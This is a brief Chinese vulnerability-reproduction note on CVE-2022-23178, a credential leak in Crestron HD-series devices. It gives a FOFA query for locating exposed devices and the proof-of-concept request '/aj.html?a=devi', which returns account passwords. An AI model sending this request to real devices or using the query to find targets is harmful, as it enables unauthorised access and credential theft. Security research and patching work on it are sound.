# Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178

## 漏洞描述

Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息

## 漏洞影响

```
Crestron HD等系列设备
```

## FOFA

```
app="Crestron-HD-RX-201-C-E"
```

## 漏洞复现

POC

```
/aj.html?a=devi
```

![image-20220519161948146](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191619189.png)